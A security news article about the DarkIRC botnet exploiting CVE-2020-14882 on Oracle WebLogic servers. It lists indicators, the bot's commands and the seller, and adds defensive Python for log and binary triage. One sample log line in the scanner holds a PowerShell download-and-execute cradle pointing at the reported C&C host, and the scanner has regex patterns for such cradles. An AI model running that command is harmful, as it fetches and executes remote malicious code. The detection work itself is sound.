Recently, the Juniper threat lab has identified a DarkIRC botnet that is actively attacking thousands of exposed Oracle WebLogic servers. All these attacks are intended to exploit the CVE-2020-14882 remote code execution vulnerability that Oracle fixed two months ago.
Cyber Security News recently reported that attackers have begun probing every server running the affected Oracle WebLogic release. The WebLogic Server flaw, tracked as CVE-2020-14882, can be exploited by a threat actor with network access over HTTP.
Based on Shodan statistics, nearly 3000 Oracle WebLogic servers are reachable from the internet, and the flaw allows unauthenticated attackers to execute code remotely on any of them.
DarkIRC
The researchers report that DarkIRC is delivered to unpatched servers through a PowerShell script launched via an HTTP GET request; the script fetches a malicious binary that comes with both anti-analysis and anti-sandbox capabilities.
The attack executes a PowerShell script that downloads and runs a binary hosted at cnc[.]c25e6559668942[.]xyz. The researchers also noted the source IP of the attack, 83.97.20.90, which matches the C&C of the bot, indicating that the attacking IP and the C&C are one and the same.
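As an added defensive example (not code from Juniper or from this article), the following Python script scans web-server access-log lines for the two indicators the text gives (the source IP 83.97.20.90 and the C&C host cnc[.]c25e6559668942[.]xyz, written back in dotted form so it can be matched) and for PowerShell download-cradle fragments inside the request, after undoing repeated percent-encoding. The combined log format, the cradle patterns and the sample log lines are assumptions constructed for the example.

```python
"""Flag web-server requests that match the DarkIRC campaign's reported IoCs or
carry a PowerShell download cradle. Added defensive example, not Juniper's code."""
import re
from urllib.parse import unquote

# Indicators reported in the article. The domain is written back from its
# defanged form (cnc[.]c25e6559668942[.]xyz) so substring matching works.
IOC_DOMAINS = {"cnc.c25e6559668942.xyz"}
IOC_IPS = {"83.97.20.90"}

# Fragments typical of PowerShell download cradles injected into HTTP requests.
# Assumed, generic patterns; not strings taken from the reported sample.
CRADLE_RE = re.compile(
    r"powershell|pwsh|downloadstring|downloadfile|invoke-expression|\biex\b|-enc\w*|frombase64string",
    re.IGNORECASE,
)

# Apache/NGINX "combined" access-log format (assumed for the example).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def fully_decode(s, rounds=3):
    """Undo repeated percent-encoding so double-encoded payloads become visible."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for a clean one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    reasons = []
    if m["ip"] in IOC_IPS:
        reasons.append("source ip matches reported C&C/attacker ip")
    # Look at target, referer and user-agent together, decoded and lower-cased.
    haystack = fully_decode(m["target"] + " " + m["referer"] + " " + m["ua"]).lower()
    if CRADLE_RE.search(haystack):
        reasons.append("request carries a PowerShell download cradle")
    for dom in IOC_DOMAINS:
        if dom in haystack:
            reasons.append(f"request references reported C&C host {dom}")
    if not reasons:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "target": m["target"], "reasons": reasons}


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep only findings."""
    return [f for f in (analyze_line(line) for line in lines) if f]


# Constructed sample log lines (not real traffic); the second one is double-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Nov/2020:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3120 "-" "Mozilla/5.0"',
    '83.97.20.90 - - [30/Nov/2020:10:00:02 +0000] "GET /app/endpoint?cmd=powershell%2520-c%2520IEX(New-Object%2520Net.WebClient).DownloadString(%27http://cnc.c25e6559668942.xyz/x.ps1%27) HTTP/1.1" 200 0 "-" "curl/7.64"',
    '198.51.100.7 - - [30/Nov/2020:10:00:03 +0000] "GET /app/report?id=42 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [30/Nov/2020:10:00:04 +0000] "POST /app/endpoint HTTP/1.1" 500 0 "http://cnc.c25e6559668942.xyz/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ts"], finding["ip"], finding["target"], "->", "; ".join(finding["reasons"]))
```

Decoding the request several times matters because attackers routinely double-encode payloads to slip past single-pass filters; matching on the referer as well catches hosts that only show up as a follow-on fetch rather than in the request line.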
The Crypter
A crypter, or packer, is generally used to hide the real purpose of a binary and to evade detection. This crypter also carries anti-analysis and anti-sandbox functions: they check whether it is running in a virtualized environment and, if so, decide not to proceed with its malicious routine.
Virtual environments the crypter checks for
- VMware
- VirtualBox
- VBox
- QEMU
- Xen
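As an added triage example (not code from Juniper or from this article), the Python below searches a binary blob for the virtualization vendor names listed above, in both ASCII and UTF-16LE, since Windows binaries frequently store such strings as wide characters that a plain ASCII `strings` pass misses. The sample blob is constructed for the example; a hit is only a hint that a sample contains VM checks, not proof of it.

```python
"""Triage heuristic: find the virtualization vendor names the crypter checks for
inside a binary, in ASCII and UTF-16LE. Added example, not the Juniper analysis code."""

# Vendor names from the article's list of environments the crypter detects.
VM_MARKERS = ["VMware", "VirtualBox", "VBox", "QEMU", "Xen"]


def find_vm_markers(blob: bytes):
    """Return (marker, encoding, offset) hits sorted by offset, case-insensitively."""
    # Lower-casing the bytes also works for UTF-16LE, since the ASCII code units
    # are lowered and the interleaved null bytes are left untouched.
    lowered = blob.lower()
    hits = []
    for marker in VM_MARKERS:
        for enc in ("ascii", "utf-16-le"):
            needle = marker.lower().encode(enc)
            start = 0
            while True:
                idx = lowered.find(needle, start)
                if idx < 0:
                    break
                hits.append((marker, enc, idx))
                start = idx + 1
    return sorted(hits, key=lambda h: h[2])


def vm_marker_summary(blob: bytes):
    """Distinct vendor names seen, for a quick verdict line in a triage report."""
    return sorted({marker for marker, _, _ in find_vm_markers(blob)})


# Constructed sample: a fake PE header, an ASCII registry-style path mentioning
# VMware twice, and a UTF-16LE driver name mentioning VBox.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"SOFTWARE\\VMware, Inc.\\VMware Tools\x00"
    + "VBoxGuest".encode("utf-16-le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for marker, enc, offset in find_vm_markers(SAMPLE):
        print(f"{offset:#08x} {enc:10} {marker}")
    print("summary:", vm_marker_summary(SAMPLE))
```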
Bot Functions
According to the researchers' report, the bot includes several functions, listed below:
- Browser Stealer
- Keylogging
- Bitcoin Clipper
- DDoS
- Slowloris
- RUDY
- TCP Flood
- HTTP Flood
- UDP Flood
- Syn Flood
- Worm or spread itself in the network
- Download Files
- Execute Commands
Who is behind this?
The Juniper threat lab researchers found a Hack Forums account named “Freak_OG” that had advertised this botnet earlier, in August 2020, for $75USD. On November 1, the same account posted a FUD Crypter, which it has been selling for $25USD.
The researchers have not yet confirmed whether the bot operator who attacked the honeypot is the same person promoting this malware on Hack Forums or one of their customers.
Bot commands
- Steal: Take browser passwords
- mssql: Spread via mssql (brute force)
- stopall: Stop all flood attacks
- rudy: Start or stop RUDY flood attacks; if the command carries a stop argument, RUDY attacks are stopped.
- rdp: Spread via RDP (brute force)
- update: Renew this bot
- upload: Upload files
- dlexerem: Download, execute and remove
- udp: Start/Stop udp flood attacks
- version: Get version info of the infected system
- dlexe: Download and execute
- username: Get username of the infected system
- cd: Set current directory
- getip: Get the IP address of the infected system
- md5: Get config md5 of Bot
- usbspread: Spread via USB
- tcp: Start/Stop tcp flood attack
- discord: Steal discord token
- botversion: Get bot version
- syn: Syn flood
- HTTP: Http flood
- slowloris: Slowloris DDoS attack
- uninstall: Uninstall itself
- smb: Spread via SMB
- cmd: Run command
Meanwhile, the researchers are still investigating the whole attack so that they can identify all the victims. One of the quickest ways for attackers to claim victims is to take a zero-day exploit and fire it across the internet in a spray-and-pray fashion.